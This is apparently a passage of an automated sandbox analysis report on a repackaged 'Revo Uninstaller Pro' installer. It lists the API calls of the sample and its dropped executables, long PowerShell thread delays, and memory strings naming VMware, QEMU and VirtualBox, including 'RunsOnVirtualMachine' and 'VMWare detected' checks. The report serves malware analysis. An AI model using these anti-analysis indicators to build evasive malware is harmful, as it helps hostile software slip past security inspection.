      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_00FDA2DF
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_00FEAFB9
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_004069FF FindFirstFileW,FindClose,26_2_004069FF
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,26_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00402930 FindFirstFileW,26_2_00402930
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FED353 VirtualQuery,GetSystemInfo,16_2_00FED353
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\Jump to behavior
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.13B44170A-1377-48FC-B6B3-368C307523586.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.44242424C-D130-4AD7-BDF1-DE7171B2AB906.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.16.0B2A67D4A-5BEC-EA52-874C-74EC4CB5270D6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1542DE07B-58FA-448D-A03B-839409DD9E3C6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{B62BB102-57D8-420A-9403-494D81F09EA6}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {5E16122B-D844-47B7-BB31-DA054680E671}VMware PlayerMsiExec.exe /X{5E16122B-D844-47B7-BB31-DA054680E671}16.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B261000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1B62B86D5-1F75-E130-728D-C2389C19C4216.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {17C3235A-A4B9-44ED-8794-54D8408F9733}VMware Fusion PC Migration AgentMsiExec.exe /I{17C3235A-A4B9-44ED-8794-54D8408F9733}5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.45B1FE2E8-3EAA-4084-AB49-86C371FD57F010.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Error in RunsOnVirtualMachineU
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}VMware PlayerMsiExec.exe /X{B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1B4ED644D-9E22-4DCF-8EC5-0842C70E179F10.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Call: RunsOnVirtualMachine
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0832A0C4E-0513-4EB8-BC57-FC06C3E4A3AD6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.227542D48-5663-4A91-9043-4324A8A21FFD6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.113C921E7-8314-4819-948E-2F9F8B0951BB10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.13B6B1C7F-7E70-4965-85B0-609252867B2B6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0689E1E35-CD38-45EF-BFC1-A207A94A6E356.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A2AFD234-28B3-4674-A5D0-0B0F6506EE226.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Fusion PC Migration AgentVMware, Inc.5.1C9EDBF7C-FAE6-5B7D-2D8E-F409BAB3C59A6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1B0C15D57-1F93-4986-808F-710FFB0686A96.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.16.064C6F385-E0E0-B5AE-819C-253D7C606A4210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files (x86)\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files (x86)\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare detected
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E5D4C4C9-3710-4149-AA8D-BB54149B73B46.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.102C9828F-B700-A8CA-EA5C-C07D973B2D8910.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4EC80F048-95D4-4F72-B498-C2CF528E52036.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1367FB481-70A4-2BD9-D89F-D204ADA9525A6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ACB5A703-699E-4EC4-8293-F79DB759E87E6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.15546167B-7BB3-4E63-9071-5AE0E2FEC1E66.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1930AC8C3-2482-4219-AAB4-6EC8F4F28D586.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000A97000.00000002.00000001.01000000.0000000F.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: RunsOnVirtualMachine
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: VBoxService.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.05960DB4E-29FC-438D-8C4A-D210BB57687110.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1555EAE6D-8547-4704-B511-DE16BE0A88CF6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1452FEA7E-D933-41A7-9E0A-BFFEB327C2F410.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files (x86)\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E0F86B18-CDF6-4CD1-BC30-47D14A43766F10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0
